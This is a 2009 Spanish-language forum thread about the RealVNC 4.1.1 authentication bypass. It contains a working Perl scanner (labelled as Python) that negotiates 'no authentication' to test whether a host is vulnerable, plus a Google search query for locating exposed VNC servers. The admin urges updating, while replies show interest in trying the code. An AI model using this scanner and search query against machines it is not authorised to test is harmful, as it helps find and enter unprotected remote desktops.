Hola Visitante

Autor Tema: Vulnerabilidad en RealVnc  (Leído 2137 veces)

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Vulnerabilidad en RealVnc
« en: Mayo 31, 2009, 03:14:09 pm »
Hace ya algún tiempo, se informó sobre una grave vulnerabilidad del servidor vnc de RealVNC (4.1.1). Esta vulnerabilidad puede llevar a un atacante, sin grandes conocimientos en informática y programación a poder tomar el control de un equipo con este software instalado.

Esta vulnerabilidad radica en un fallo en la autentificación que el cliente VNC envía al servidor, por lo que si el cliente modifica el tipo de autentificación, éste puede acceder sin ningún tipo de restricción por contraseña al servidor.

Se pueden ver la gran cantidad de gente que suele utilizar este software haciendo click en este link.
http://www.google.es/search?q=inurl%3A5800+%22VNC+Desktop%22+&start=0&ie=utf-8&oe=utf-8&client=firefox-a&rls=org.mozilla:es-ES:official


Y mediante este simple scanner, se puede comprobar la gravedad de este fallo:

Código: (python) [Seleccionar]

#!/usr/bin/perl

# scan for OpenVNC 4.11 authentication bypass

use IO::Socket;

$host = $ARGV[0];
$port = $ARGV[1] || 5900;
$host or die(\"$0 \\\\n\");

#print \"Connecting to $host:$port...\"; $| = 1;
($sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',)) ? print \"success!\\\\n\"
: die(\"failed\\\\n\");


#negotiate protocol
$sock->read($protocol_version,12);
print $sock $protocol_version;
# print \"Using protocol $protocol_version\";

# get security types that we'll be ignoring
$sock->read($security_types,1);
$sock->read($hahaha,unpack('C',$security_types));

# choose no authentication
print $sock \"\\\\x01\";

# we should get \"0000\" back
$sock->read($in,4);
if(unpack('I',$in)) { die(\"Not vulnerable\\\\n\") };

# client initialize
print $sock \"\\\\x01\";

# if the server starts sending data we are in
$sock->read($in,4);
(unpack('I',$in)) ? print(\"$host Vulnerable!\\\\n\") : die(\"Not vulnerable\\\\n\") ;

exit;


se recomienda actualizarse cuanto antes

NachoPistacho

  • Full Member
  • ***
  • Mensajes: 161
    • Ver Perfil
Re: Vulnerabilidad en RealVnc
« Respuesta #1 en: Mayo 31, 2009, 11:28:35 pm »
O_O! Quiero probar, que se supone que se hace con ese código? O_o

Berni69

  • Administrator
  • *****
  • Mensajes: 25
    • Ver Perfil
Re: Vulnerabilidad en RealVnc
« Respuesta #2 en: Junio 01, 2009, 09:42:11 am »
pues únicamente te dice si ese equipo es vulnerable y que tipo de vulnerabilidad tiene, creo que puede atacar, todo es mirar de ejecutarlo, ya quee s perl, cualqueir linux que tenga perl bastara para ejecutar este codigo

Saludos

yo tambien quiero probarlo, pero ya terminada la selectividad...  :P